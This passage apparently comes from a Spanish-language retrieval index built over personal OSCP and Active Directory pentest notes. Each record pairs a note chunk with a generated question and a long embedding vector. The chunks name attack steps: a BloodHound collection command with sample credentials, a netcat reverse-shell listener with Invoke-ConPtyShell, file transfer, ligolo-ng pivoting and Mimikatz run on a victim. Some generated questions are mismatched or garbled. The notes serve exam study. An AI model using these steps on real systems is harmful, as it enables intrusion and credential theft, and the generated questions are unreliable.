0.01278, -0.02597, 0.01783, 0.0084, 0.00568, -0.02135, -0.01196, 0.03638, 0.05088, -0.03099, -0.03762, 0.06805, 0.01118, -0.00313, 0.00031, -0.07222, -0.0279, -0.03056, 0.05366, -0.00013, -0.0333, -0.05907, -0.03676, -0.04687, 0.01699, -0.02359, -0.05881, -0.0773, 0.04885, 0.05454, -0.01118, 0.01803, -0.04716]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# 1) Recolectar datos desde Kali (necesitas creds vΓ‘lidas)\nbloodhound-python -u juan -p 'Password1' -d corp.local -ns 10.10.10.10 -c All", "indexar": "cual es la alternativa libre a bloodhound-python para mapeo de identidades?", "v": [0.07621, -0.05681, -0.01655, -0.02309, -0.04999, -0.09271, -0.0505, -0.07359, -0.17996, 0.02339, 0.08376, -0.06317, 0.01636, 0.06637, -0.06588, -0.04142, -0.00706, 0.05056, 0.13086, -0.17179, -0.14656, 0.01037, -0.17529, -0.02839, -0.04503, 0.05553, -0.01464, 0.08753, -0.08703, -0.00959, -0.00827, -0.01692, 0.02873, -0.02839, -0.12242, -0.07938, 0.07341, 0.14372, -0.03346, 0.08077, -0.08208, -0.10507, 0.06215, 0.10868, -0.02788, -0.0247, -0.07019, 0.10938, 0.04883, 0.06894, -0.06127, -0.03333, -0.1188, -0.08436, 0.07117, -0.05759, 0.1424, -0.06412, 0.07095, 0.02327, -0.15398, -0.00552, 0.09515, 0.02543, 0.02977, -0.01474, 0.01438, -0.07209, -0.07268, 0.16558, -0.01692, 0.06599, 0.01667, 0.0208, -0.07317, -0.00925, -0.11009, -0.14359, 0.03616, 0.09692, 0.03496, -0.02161, -0.07692, 0.03317, -0.04215, -0.13928, 0.07674, -0.0527, 0.1645, 0.08705, 0.02591, 0.05865, 0.01457, 0.0711, -0.06407, -0.05021, -0.01028, -0.00463, 0.00838, 0.06558, -0.01266, 0.04888, -0.12091, 0.09148, 0.04797, -0.00689, -0.10592, 0.0573, -0.04977, 0.04, 0.06298, 0.02168, -0.07556, 0.08167, 0.06397, -0.04792, 0.10146, 0.08938, 0.08283, 0.02987, -0.07702, 0.03483, -0.01495, 0.00863, -0.01277, 0.06815, -0.00636, 0.08659, -0.03294, 0.01501, -0.01777, 0.01748, -0.086, -0.10106, -0.08978, 0.08239, 0.05718, -0.06061, 0.09857, 0.0078, -0.07087, -0.00467, 0.05492, -0.00975, 0.00347, 0.03117, -0.0209, -0.06797, -0.05165, 0.01847, -0.0514, 0.03652, 0.01664, 0.1003, -0.01413, 0.02791, -0.08303, -0.05195, -0.08607, 0.03288, 0.00541, -0.03555, -0.02222, -0.04328, 0.00054, 0.0741, 0.03184, -0.04222, 0.04337, -0.03823, 0.03587, 0.00837, 0.10489, -0.03158, 0.01954, -0.07018, 0.04902, -0.08116, -0.03593, 0.04257, 0.11255, -0.03424, -0.0256, -0.02187, 0.07729, -0.04112, -0.00387, 0.02133, 0.01571, -0.06469, -0.02077, 0.08722, 0.04578, 0.0052, -0.03753, 0.00614, 0.0825, -0.01171, -0.02926, -0.03735, -0.00633, 0.03225, -0.04344, 0.01608, -0.00349, 0.06408, -0.05386, -0.00588, -0.03929, 0.04103, -0.01329, -0.03882, 0.08176, -0.03037, -0.02271, -0.04688, -0.01793, 0.00879, -0.00842, -0.03377, 0.00474, 0.01542, 0.02991, 0.0623, -0.01724, 0.03153, 0.04899, -0.01818, 0.02768, -0.04299, 0.05608, 0.04396, -0.0654, -0.00102, 0.02967, 0.04685, 0.0282, -0.00178, 0.04928, -0.03727, 0.02854, 0.06373, -0.04877, -0.02202, -0.05632, 0.03181, 0.00666, -0.06022, -0.03489, -0.04299, 0.00355, 0.01471, 0.01196, 0.0552, 0.05417, 0.01236]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Resumen TL;DR\n\n| Pregunta | Respuesta |\n|---|---|\n| ΒΏTengo GUI central? | **No**. Tu \"GUI\" es tener varios terminales abiertos. BloodHound es la ΓΊnica tool con GUI propia. |\n| ΒΏReverse shell? | `nc` + `Invoke-ConPtyShell` desde la vΓ­ctima. Lo recibes en `nc -lvnp 4444`. |\n| ΒΏCΓ³mo envΓ­o datos? | **Subes** con `python3 -m http.server`. **Recibo** con `impacket-smbserver`. |\n| ΒΏCΓ³mo pivoto? | `ligolo-ng` (proxy en Kali + agent en vΓ­ctima). Una vez montado, las herramientas tiran por el tΓΊnel transparente. |\n| ΒΏBloodHound? | `apt install bloodhound bloodhound.py neo4j`. |\n| ΒΏMimikatz? | Descargado en `tu carpeta`. Se ejecuta **en la vΓ­ctima**, no en Kali. |\n| ΒΏImpacket? | Instalado a nivel sistema (`impacket-*`). Corre en Kali, habla con vΓ­ctimas. |", "indexar": "quΓ© programa me permite visualizar el grafo de credenciales de dominio sin necesidad de instalar bases de datos?", "v": [-0.1415, 0.06686, -0.13867, -0.22939, 0.12253, -0.07059, 0.05772, -0.08958, -0.18451, -0.03644, 0.02047, -0.08441, -0.19079, -0.20961, 0.08076, 0.05661, 0.09074, -0.13201, -0.00525, -0.05739, -0.06213, -0.12406, -0.01764, -0.0737, -0.13387, -0.0453, -0.02838, -0.10797, -0.02409, 0.12693, 0.08298, -0.02795, -0.05872, -0.09576, -0.07238, -0.05305, -0.0553, 0.01839, 0.03608, 0.04507, -0.01828, -0.03876, -0.04772, 0.1192, 0.07217, -0.11466, -0.03413, -0.03103, -0.02012, -0.12273, 0.00962, -0.00715, -0.06348, -0.06711, 0.04368, -0.11955, 0.0734, -0.18374, 0.05854, 0.00164, -0.09793, 0.07765, 0.04676, 0.03066, -0.00947, -0.04207, 0.07202, 0.09209, -0.04477, 0.06878, -0.02757, 0.01827, -0.00059, -0.01309, 0.04816, -0.0715, 0.00678, -0.08675, 0.10847, -0.03184, 0.04857, 0.00557, -0.04927, 0.07341, -0.11796, -0.00372, -0.03338, 0.01124, -0.03417, 0.01198, 0.087, 0.08828, -0.06052, 0.0395, 0.07439, -0.01354, 0.04593, -0.02214, 0.00177, 0.03965, 0.02761, 0.04356, -0.07319, 0.05823, 0.06292, 0.07339, 0.07715, -0.01295, -0.09118, 0.00412, 0.0069, 0.00535, -0.06202, -0.00417, 3e-05, 0.02486, 0.0407, -0.00643, -0.01981, -0.07367, -0.04161, -0.03089, 0.05448, 0.00115, -0.00149, -0.05442, -0.06969, 0.11366, -0.03805, 0.00963, -0.01927, -0.04383, -0.02634, -0.00954, -0.05617, 0.02222, -0.02737, -0.02776, -0.06123, -0.07177, -0.03099, 0.04793, -0.06495, -0.00981, 0.00762, -0.00043, 0.03014, -0.0706, -0.06958, -0.03989, -0.05794, 0.05844, 0.01005, 0.0671, -0.02993, -0.0003, 0.03839, -0.05792, -0.01413, 0.01257, -0.05916, -0.01024, -0.01113, 0.00801, 0.00631, -0.06378, 0.00018, 0.06538, 0.04986, 0.1533, -0.05224, 0.10376, -0.02075, -0.05015, 0.06156, 0.00217, -0.03586, -0.08976, -0.06975, -0.01346, -0.03092, -0.00777, 0.08853, 0.07042, -0.03052, -0.00937, -0.04377, -0.01157, 0.04581, -0.01791, 0.03739, 0.07797, -0.08638, 0.01949, 0.05393, -0.09494, -0.00575, 0.01148, 0.02751, 0.01159, -0.08966, -0.00068, -0.01736, -0.02385, 0.06493, 0.10639, 0.0085, -0.017, 0.0363, 0.03394, -0.01082, -0.02373, 0.01093, -0.03648, -0.04141, -0.01887, 0.02363, 0.02649, 0.05024, -0.03289, -0.04345, 0.01318, 0.02676, -0.02626, -0.04124, -0.08079, 0.02692, 0.02294, 0.05447, -0.00013, -0.00904, 0.01254, 0.00418, -0.01775, 0.05956, -0.02145, -0.02448, -0.0325, -0.01236, -0.08655, -0.00648, 0.09433, -0.00897, -0.06807, -0.0473, -0.0251, -0.07651, 0.03261, 0.02263, -0.05769, -0.04552, 0.03721, 0.04665, -0.0467, 0.0218, 0.01873]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Resumen TL;DR\n\n| Pregunta | Respuesta |\n|---|---|\n| ΒΏTengo GUI central? | **No**. Tu \"GUI\" es tener varios terminales abiertos. BloodHound es la ΓΊnica tool con GUI propia. |\n| ΒΏReverse shell? | `nc` + `Invoke-ConPtyShell` desde la vΓ­ctima. Lo recibes en `nc -lvnp 4444`. |\n| ΒΏCΓ³mo envΓ­o datos? | **Subes** con `python3 -m http.server`. **Recibo** con `impacket-smbserver`. |\n| ΒΏCΓ³mo pivoto? | `ligolo-ng` (proxy en Kali + agent en vΓ­ctima). Una vez montado, las herramientas tiran por el tΓΊnel transparente. |\n| ΒΏBloodHound? | `apt install bloodhound bloodhound.py neo4j`. |\n| ΒΏMimikatz? | Descargado en `tu carpeta`. Se ejecuta **en la vΓ­ctima**, no en Kali. |\n| ΒΏImpacket? | Instalado a nivel sistema (`impacket-*`). Corre en Kali, habla con vΓ­ctimas. |", "indexar": "con quΓ© herramienta puedo crear un revers shell usando nc y enviar archivos desde la vΓ­ctima a mi mΓ‘quina?", "v": [-0.00131, 0.06489, -0.10447, -0.12879, -0.12461, -0.10063, -0.22649, 0.01754, -0.03726, -0.10495, -0.09407, -0.09375, 0.06288, -0.02173, -0.00077, 0.03215, 0.05738, -0.04244, 0.08016, 0.0441, -0.0742, -0.05863, -0.02255, -0.08177, -0.13156, 0.05587, 0.04676, 0.03812, -0.18625, 0.00668, -0.03098, -0.04996, 0.0457, -0.00216, 0.00139, -0.00529, -0.02412, -0.00083, -0.00048, 0.10011, 0.08015, 0.07804, -0.18896, 0.09722, 0.08567, -0.06707, 0.01985, -0.05873, 0.00072, 0.06626, -0.03989, -0.1856, -0.26214, -0.01598, -0.01284, -0.09328, 0.14563, -0.11504, 0.14315, -0.08482, -0.10317, 0.09655, -0.07203, 0.06856, -0.00279, -0.10102, -0.03036, -0.08481, -0.14845, 0.01076, -0.01078, -0.05597, 0.00829, -0.01658, -0.00693, 0.00827, 0.02563, 0.03805, -0.0067, -0.02682, -0.05769, -0.05123, -0.09435, 0.00733, -0.00931, -0.02075, 0.12463, -0.01749, 0.0687, -0.10515, 0.02855, -0.02038, -0.01095, 0.02592, 0.03813, -0.06312, 0.02661, -0.05937, -0.02266, -0.04012, 0.14663, -0.08855, 0.01869, 0.14012, 0.04517, -0.0218, -0.03225, 0.03337, -0.06739, -0.00108, 0.06101, -0.0139, 0.03194, 0.01741, -0.06477, -0.00891, -0.03412, -0.04914, 0.01943, -0.00233, 0.08177, 0.10671, 0.00192, -0.04858, -0.00812, -0.01677, -0.03369, 0.07946, -0.09471, -0.02708, 0.05642, 0.00633, -0.06418, 0.00537, 0.01615, 0.05423, 0.07018, -0.0794, -0.02113, -0.06704, 0.05499, 0.08384, -0.08473, -0.05422, -0.01526, -0.01951, 0.02263, -0.13349, -0.08393, -0.05281, 0.06929, -0.03151, 0.02125, -0.01482, -0.12079, 0.00899, -0.0395, -0.06283, -0.04773, 0.0191, -0.09576, 0.05488, -0.04433, 0.05025, -0.02002, -0.07358, -0.00486, 0.00336, 0.08006, 0.01213, 0.02696, -0.021, 0.07368, 0.02863, 0.00915, -0.06939, -0.0015, -0.02286, -0.01308, -0.07061, 0.03346, 0.03053, -0.03851, -0.04749, -0.01402, -0.06697, 0.0548, 0.01563, 0.03154, 0.06355, 0.00648, 0.06814, 0.02489, -0.0437, 0.00102, -0.00875, -0.04647, -0.02113, 0.02377, 0.00826, -0.07807, 0.03488, -0.02096, -0.03788, 0.01991, 0.0578, -0.06882, -0.03318, -0.03859, -0.01158, 0.05702, 0.03156, 0.03571, -0.00831, 0.01084, -0.00343, 0.01769, 0.00553, -0.00088, 0.02009, 0.02006, -0.03273, -0.0018, 0.00223, -0.00093, 0.02473, 0.0062, 0.03972, -0.00194, -0.02726, -0.01041, 0.01789, -0.01853, -0.03447, 0.01196, -0.03146, 0.04414, -0.04048, -0.07377, -0.02339, 0.00703, 0.06985, 0.00193, -0.02952, -0.01319, 0.02812, 0.00241, 0.00073, -0.06814, -0.04325, -0.01397, 0.05351, 0.02609, -0.07117, -0.00145, -0.04541]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Resumen TL;DR\n\n| Pregunta | Respuesta |\n|---|---|\n| ΒΏTengo GUI central? | **No**. Tu \"GUI\" es tener varios terminales abiertos. BloodHound es la ΓΊnica tool con GUI propia. |\n| ΒΏReverse shell? | `nc` + `Invoke-ConPtyShell` desde la vΓ­ctima. Lo recibes en `nc -lvnp 4444`. |\n| ΒΏCΓ³mo envΓ­o datos? | **Subes** con `python3 -m http.server`. **Recibo** con `impacket-smbserver`. |\n| ΒΏCΓ³mo pivoto? | `ligolo-ng` (proxy en Kali + agent en vΓ­ctima). Una vez montado, las herramientas tiran por el tΓΊnel transparente. |\n| ΒΏBloodHound? | `apt install bloodhound bloodhound.py neo4j`. |\n| ΒΏMimikatz? | Descargado en `tu carpeta`. Se ejecuta **en la vΓ­ctima**, no en Kali. |\n| ΒΏImpacket? | Instalado a nivel sistema (`impacket-*`). Corre en Kali, habla con vΓ­ctimas. |", "indexar": "cual es una alternativa libre a bloodhound para mapear las relaciones de privilegios en un entorno corporativo?", "v": [0.03347, 0.0534, 0.02392, -0.09406, -0.12022, -0.02974, 0.05359, -0.02613, -0.14248, -0.11915, -0.01195, -0.09111, 0.0074, 0.08569, -0.02171, 0.01881, 0.06441, -0.00222, 0.03564, -0.05643, -0.02045, -0.07459, -0.10533, 0.04001, -0.00831, -0.08971, 0.05574, 0.02433, -0.08287, 0.12374, 0.00384, 0.02331, 0.07618, -0.00402, -0.04674, 0.04654, 0.053, 0.16869, -0.00451, -0.0322, -0.01672, -0.16395, 0.01194, -0.01053, 0.02641, -0.02954, -0.21827, 0.10249, 0.10832, 0.05798, -0.07324, -0.03342, -0.14644, -0.09555, 0.07481, 0.10392, 0.08397, -0.04592, 0.05794, -0.03179, -0.13631, -0.0357, 0.03631, -0.05951, -0.0074, -0.00017, 0.04096, -0.02239, -0.03493, 0.08451, -0.00511, -0.05034, 0.00245, 0.00335, -0.08949, -0.0083, -0.06639, -0.01613, -0.05966, 0.06357, 0.05653, 0.0364, -0.01428, 0.11838, -0.05092, -0.02252, 0.11332, 0.03354, 0.1033, 0.13606, 0.02358, 0.03681, -0.025, 0.01512, -0.04531, -0.12313, -0.12487, 0.04726, 0.03922, 0.07207, 0.0824, 0.04195, -0.21631, 0.0507, 0.00179, -0.02221, -0.10651, -0.041, -0.01934, 0.01874, -0.00577, 0.06146, 0.03393, 0.08022, -0.0284, -0.02263, 0.11187, 0.09676, 0.05318, -0.08509, -0.11961, -0.04507, 0.0298, -0.0388, -0.10474, 0.01997, 0.03768, 0.0263, 0.01603, 0.0658, -0.09188, 0.05709, -0.12134, -0.09916, -0.06768, -0.01357, 0.03168, 0.03793, 0.03934, -0.13067, 0.00217, -0.01956, 0.03657, -0.01501, 0.04261, 0.04099, 0.00547, -0.01986, 0.00088, 0.03695, -0.10156, 0.00224, -0.0691, 0.06009, -0.02283, -0.0243, -0.04713, -0.03519, -0.03679, 0.06515, 0.02271, -0.07182, -0.02492, 0.07572, 0.06121, 0.01652, -0.01381, -0.06939, -0.08116, -0.00381, 0.02341, -0.00358, 0.03666, -0.06396, -0.00814, -0.02389, 0.06926, -0.08754, 0.00869, 0.05554, 0.04498, -0.00164, -0.03158, 0.04709, 0.00588, 0.0103, 0.01228, 0.00877, 0.04868, -0.04408, -0.02414, 0.1144, 0.09273, -0.03956, 0.01765, -0.04296, 0.04746, -0.03138, -0.06425, -0.02264, 0.00545, -0.04931, -0.00205, 0.01293, 0.00337, 0.03809, 0.00847, 0.03502, -0.06013, 0.09749, 0.01218, 0.04027, 0.05272, 0.01766, -0.07688, -0.00043, 0.05977, -0.00771, 0.01494, -0.00825, 0.07274, -0.03128, 0.08689, -0.01774, 0.0025, 0.00146, -0.01335, 0.02219, -0.00867, -0.06056, 0.08068, 0.01788, -0.00543, -0.01893, -0.04573, 0.0462, 0.05677, -0.0815, 0.0449, -0.06121, 0.11959, 0.05751, -0.03195, -0.00839, -0.1102, -0.03198, -0.05619, -0.0542, -0.02291, -0.07281, -0.00092, -0.02286, 0.04853, 0.03311, 0.05033, 0.02492]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "# πŸ—ΊοΈ OSCP β€” Mapa Central (MOC)\n\n> Nota hub del vault. Desde aquΓ­ salen todos los caminos.\n> Origen: apuntes propios en `tu carpeta` + material de un laboratorio.", "indexar": "que herramienta sirve para organizar y gestionar el mapa de ruta OSCP?", "v": [-0.06079, -0.03952, -0.15779, -0.25603, 0.03981, -0.20126, -0.02825, 0.02982, -0.05544, -0.06696, -0.11923, -0.1288, 0.14826, -0.0538, 0.05262, 0.03209, 0.08822, 0.00681, -0.05043, -0.02023, -0.14482, 0.03588, 0.02805, 0.10957, -0.08185, 0.01505, 0.15076, -0.0967, -0.12626, -0.02954, 0.01823, 0.077, -0.0178, -0.11891, -0.01638, -0.02347, -0.04865, -0.0345, -0.03073, -0.00666, -0.15928, 0.07843, -0.04447, 0.1323, 0.11994, 0.00056, 0.03791, -0.02757, -0.00937, 0.03138, -0.1163, -0.19979, -0.11602, -0.03804, 0.02846, -0.07127, -0.01911, -0.1286, 0.0212, -0.08117, -0.05981, 0.01387, -0.11335, -0.02221, 0.0808, -0.01927, -0.0382, -0.04932, -0.11263, 0.03105, -0.09331, 0.09091, 0.00679, 0.05574, 0.02524, -0.05241, 0.07108, 0.14231, 0.1093, 0.03384, 0.12513, -0.016, -0.11151, 0.03594, -0.04115, -0.08836, 0.1173, 0.03033, 0.01109, -0.06362, -0.07055, 0.03139, -0.00273, -0.02781, -0.0002, -0.04576, 0.06927, 0.03204, 0.07743, 0.00636, 0.05075, -0.0586, -0.09874, 0.09405, -0.1092, 0.04346, 0.05457, -0.01317, -0.01316, 0.04633, 0.01807, 0.03361, -0.01581, 0.0224, -0.02247, -0.01269, 0.03935, -0.01571, -0.0046, -0.0186, -0.02791, 0.03662, -0.05966, 0.03185, 0.03055, 0.03426, -0.00946, 0.11521, 0.06719, -0.03509, 0.00525, -0.03607, -0.07268, -0.00489, -0.08412, -0.06582, -0.08125, -0.06257, 0.02133, -0.06524, -0.08143, 0.10847, -0.08135, -0.12154, 0.03632, -0.01155, 0.03047, -0.04708, 0.01996, 0.07619, 0.04475, -0.0454, -0.00684, 0.03822, 0.02045, 0.02915, -0.06697, -0.01015, -0.10317, 0.05151, -0.04844, -0.0376, -0.0032, 0.04997, 0.05811, -0.06104, 0.03878, 0.01886, 0.03865, -0.00764, -0.00064, 0.05506, 0.07056, -0.00842, -0.00353, -0.10104, -0.04021, -0.04551, 0.07123, 0.04444, 0.01001, -0.00582, 0.0439, 0.0337, -0.03137, -0.01644, 0.04173, 0.03192, 0.00506, -0.00589, 0.02283, 0.0276, 0.04648, -0.08121, 0.02105, -0.04404, 0.01106, -0.0201, 0.01503, 0.0151, -0.02326, -0.04906, 0.00118, -0.02119, 0.03054, 0.04881, -0.00935, 0.05023, 0.05751, 0.05318, 0.01507, -0.00622, 0.03287, -0.0321, -0.02487, -0.00324, 0.01954, 0.03669, -0.01221, 0.00322, -0.00605, 0.02291, -0.00898, -0.0326, 0.01792, -0.00932, 0.0093, -0.01527, 0.01634, 0.01431, 0.04064, 0.009, 0.02658, 0.00942, 0.04645, -0.03765, 0.03858, -0.03867, -0.05236, -0.03117, -0.006, 0.02835, 0.01084, -0.02791, -0.09783, -0.0479, 0.01128, -0.02193, -0.02949, -0.06429, -0.00707, -0.01926, 0.08782, 0.02325, -0.02981, -0.00462]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "# πŸ—ΊοΈ OSCP β€” Mapa Central (MOC)\n\n> Nota hub del vault. Desde aquΓ­ salen todos los caminos.\n> Origen: apuntes propios en `tu carpeta` + material de un laboratorio.", "indexar": "cual es una alternativa libre a los mapas centrales (MOC) para el estudio del OSCE?", "v": [0.03358, -0.07605, -0.03442, -0.02402, -0.12045, -0.05405, -0.05074, -0.01385, -0.25908, -0.07244, -0.15286, -0.1013, -0.03739, 0.02858, 0.07022, -0.02253, 0.14398, -0.0393, -0.00564, -0.07889, -0.10691, -0.14794, -0.09558, 0.01876, -0.0124, 0.10077, -0.05155, -0.12388, -0.15813, -0.06545, 0.02908, 0.02272, 0.03086, 0.00327, 0.01451, -0.09302, 0.02231, -0.10836, 0.01252, -0.03279, -0.0489, -0.07807, -0.10172, 0.13724, 0.11119, -0.14777, -0.05282, 0.15954, 0.08506, -0.01499, -0.153, -0.06811, -0.0941, 0.01506, 0.09877, -0.03423, 0.02521, 0.04422, -0.03292, -0.08501, -0.08612, 0.14119, 0.08572, -0.15907, 0.0999, 0.02058, -0.06456, 0.06032, -0.07542, -0.00269, 0.02638, 0.10771, 0.04399, -0.01393, -0.07153, -0.00622, -0.04279, -0.06478, 0.09885, -0.01318, 0.04912, 0.00077, -0.01822, 0.04666, -0.00894, 0.05539, 0.10341, -0.0583, -0.07263, 0.00264, -0.03407, 0.07679, -0.04362, 0.16689, 0.05925, -0.16788, 0.03078, 0.03151, 0.06897, 0.01134, 0.03566, 0.02385, -0.06244, 0.01858, -0.02971, 0.01177, -0.00826, -0.01085, -0.09975, 0.04978, -0.07608, 0.0867, -0.00177, 0.05316, 0.00674, 0.00828, 0.02444, 0.09427, -0.04576, -0.05731, -0.04203, -0.01692, 0.03332, -0.1044, -0.03211, 0.0706, 0.01051, 0.03197, 0.02469, 0.08862, -0.00886, -0.02524, -0.03576, -0.07396, -0.10932, -0.05086, 0.0134, -0.04514, 0.05621, 0.01239, -0.04851, 0.1026, -0.0002, -0.03655, 0.0833, -0.00078, 0.06291, -0.00154, 0.01528, -0.0344, -0.07009, -0.0048, 0.04562, 0.04668, -0.00341, -0.01351, -0.00234, -0.01709, -0.0541, 0.11198, 0.04631, 0.02552, -0.01917, 0.03026, -0.02455, -0.00601, -0.00029, -0.04304, -0.00741, 0.05598, -0.00181, 0.01011, 0.04556, -0.04273, 0.11279, -0.04385, 0.02332, -0.08371, 0.00487, -0.01899, -0.03631, -0.00102, -0.03058, 0.0573, -0.01656, 0.05311, -0.01294, -0.00893, 0.0633, 0.00202, -0.03549, 0.03087, -0.0024, -0.0424, 0.04687, -0.06864, 0.02945, -0.05111, -0.04264, -0.03045, -0.08215, -0.03756, -0.02727, -0.01271, 0.02366, -0.00329, -0.02984, 0.07143, 0.0234, 0.04057, -0.02209, -0.01874, 0.10743, -0.03579, -0.01761, -0.02199, 0.05958, 0.03064, 0.01135, 0.01848, 0.043, 0.0528, 0.0305, 0.02905, 0.02585, 0.05097, 0.06797, 0.03712, 0.01573, 0.00722, 0.06846, -0.00153, -0.00655, 0.00098, 0.02371, 0.05392, -0.00038, 0.01487, -0.0086, -0.04632, 0.05133, 0.065, -0.00858, 0.01263, -0.04367, -0.02517, -0.03105, -0.02804, -0.01904, -0.06831, -0.01192, 0.00721, 0.05282, -0.03323, 0.0675, 0.00971]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "# πŸ—ΊοΈ OSCP β€” Mapa Central (MOC)\n\n> Nota hub del vault. Desde aquΓ­ salen todos los caminos.\n> Origen: apuntes propios en `tu carpeta` + material de un laboratorio.", "indexar": "con que puedo montar un sistema central de apuntes basado en mi carpeta personal?", "v": [0.19564, 0.12147, -0.11419, -0.09771, -0.15437, -0.09491, 0.00967, 0.08059, -0.20105, -0.13099, -0.10716, -0.0186, -0.04009, 0.00759, 0.07739, 0.0242, 0.00998, -0.03189, 0.08632, -0.05955, 0.00146, -0.14254, 0.01463, -0.02175, -0.07243, 0.09452, 0.16256, -0.061, -0.07641, 0.06273, 0.02161, 0.12258, 0.04224, 0.05974, -0.04099, -0.11663, -0.0325, -0.02573, -0.03909, -0.10319, 0.03076, 0.09227, 0.03344, 0.09758, 0.1224, -0.01859, 0.10294, -0.03931, -0.11749, -0.01186, -0.05881, -0.13511, -0.08862, -0.08508, -0.00858, -0.16293, 0.0436, 0.02466, 0.08954, 0.02454, -0.01677, 0.09363, -0.04694, 0.02111, 0.0457, 0.00216, -0.00701, -0.13575, -0.08723, 0.0931, -0.0471, -0.04267, 0.09937, -0.0295, -0.00463, 0.00761, 0.04002, -0.09953, 0.03054, 0.02799, -0.05841, -0.0015, -0.03178, 0.06646, 0.01654, -0.04593, 0.07152, -0.03415, -0.02103, 0.06985, 0.05603, -0.06724, -0.02477, 0.03838, 0.01243, -0.04795, -0.01978, 0.07919, -0.0356, -0.04824, 0.00194, -0.00169, -0.02989, 0.18126, -0.05503, -0.08639, 0.06792, 0.01939, 0.03961, -0.13976, 0.01384, 0.06887, 0.00027, 0.06336, -0.08344, -0.09852, -0.0095, 0.13555, -0.07563, 0.02429, -0.00811, 0.03175, 0.03565, -0.06507, 0.11634, -0.01767, 0.04339, 0.05239, 0.01711, 0.13705, -0.04296, 0.04717, -0.05293, -0.0225, 0.06051, 0.00277, -0.10982, -5e-05, 0.05847, 0.00949, 0.00933, 0.03003, 0.01118, -0.05139, 0.05255, 0.08928, 0.08894, -0.09142, 0.02782, -0.04143, 0.00619, 0.04442, 0.07152, -0.04726, -0.00026, -0.05728, 0.10144, -0.00655, 0.00043, 0.00261, 0.0249, 0.02011, -0.04357, 0.04301, 0.00878, -0.00937, -0.03319, -0.00033, 0.05182, 0.09988, -0.05996, 0.04726, 0.02378, -0.00919, 0.08361, 0.02462, -0.00155, -0.05434, 0.01825, 0.09702, -0.03037, 0.03852, -0.00965, 0.04203, -0.01806, 0.00986, -0.02426, 0.05481, 0.01264, -0.01198, 0.00017, 0.04778, -0.01389, 0.09576, -0.0085, -0.03065, -0.03716, -0.00192, -0.00177, 0.02409, -0.06087, 0.0431, 0.01104, -0.03104, 0.00612, -0.00952, -0.0302, 0.021, 0.01813, 0.09817, 0.01347, 0.01368, 0.05106, -0.0896, -0.03309, 0.04017, -0.01553, 0.07007, 0.01566, -0.04999, 0.03875, 0.04496, 0.06699, 0.01778, 0.00562, -0.01207, -0.03978, 0.03078, 0.01412, -0.0329, 0.00364, -0.0208, 0.00128, -0.04186, -0.00911, -0.02463, -0.01505, 0.00371, -0.01345, -0.03409, 0.0624, 0.11154, 0.01736, -0.04715, 0.02125, -0.02055, -0.03302, 0.00666, -0.03155, -0.10478, -0.03552, -0.0505, 0.01415, -0.0398, -0.02281, -0.01525]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "## La espina dorsal\nLa MetodologΓ­a OSCP es lo ΓΊnico que de verdad importa. Todo lo demΓ‘s cuelga de ella:\n\n```\nEnumeraciΓ³n β†’ vector β†’ foothold (Reverse shell) β†’\nPrivesc Linux / Privesc Windows β†’ loot (Mimikatz) β†’\nMovimiento lateral / Active Directory β†’ documentar (Reporte OSCP)\n```", "indexar": "quΓ© programa sirve para realizar enumeraciΓ³n de servidores?", "v": [-0.12326, 0.0386, -0.15049, -0.17279, 0.11121, -0.15234, 0.06777, -0.14575, -0.06468, -0.13001, -0.11335, 0.01973, 0.07805, -0.19179, 0.09272, 0.08205, 0.1538, -0.09392, 0.09256, 0.15094, 0.02601, 0.04611, 0.05505, 0.03093, -0.14529, 0.08869, 0.03382, -0.09381, -0.02528, 0.0572, 0.0533, -0.05622, 0.03999, -0.119, 0.06427, 0.03277, 0.00347, 0.11416, -0.07873, 0.09893, 0.07952, 0.0276, -0.0771, -0.02812, 0.00732, -0.00671, 0.07922, -0.04755, 0.05848, -0.037, -0.09298, 0.04843, 0.01616, -0.04365, -0.02929, -0.03528, -0.08696, -0.12772, -0.03779, 0.00071, -0.07346, -0.01355, 0.01324, -0.05352, 0.05573, 0.0103, 0.03907, -0.04072, -0.01352, -0.01016, -0.07531, 0.00085, 0.05762, -0.10037, -0.06184, 0.01266, -0.0675, -0.03996, 0.04894, 0.01559, -0.02376, 0.02734, -0.0295, 0.05985, -0.08739, -0.02093, 0.03805, 0.03354, -0.00768, -0.01242, 0.01951, 0.13188, 0.00538, 0.0973, 0.04565, -0.01252, 0.14867, -0.02087, 0.0431, 0.06996, 0.11883, -0.07908, -0.0608, 0.09568, -0.10809, 0.13069, 0.08788, -0.02537, -0.03951, -0.01916, 0.06247, -0.07443, -0.06886, 0.02102, -0.10234, -0.07992, -0.03831, -0.01596, 0.05491, 0.04378, -0.08227, 0.08044, 0.00888, 0.06976, 0.08935, -0.04171, 0.05712, 0.05803, -0.02039, 0.00349, 0.02715, 0.00828, -0.05961, -0.01566, -0.1008, -0.11031, 0.11737, -0.02211, -0.00435, -0.04204, 0.03832, 0.04333, -0.03386, 0.0488, 0.04165, -0.04349, 0.12083, -0.04937, -0.01209, -0.00629, 0.00704, -0.03526, -0.04615, 0.03447, -0.08133, -0.07877, 0.03161, -0.02865, -0.13543, 0.0256, -0.0258, -0.01014, -0.01467, 0.01805, 0.08727, -0.04015, -0.00092, 0.06498, 0.07924, 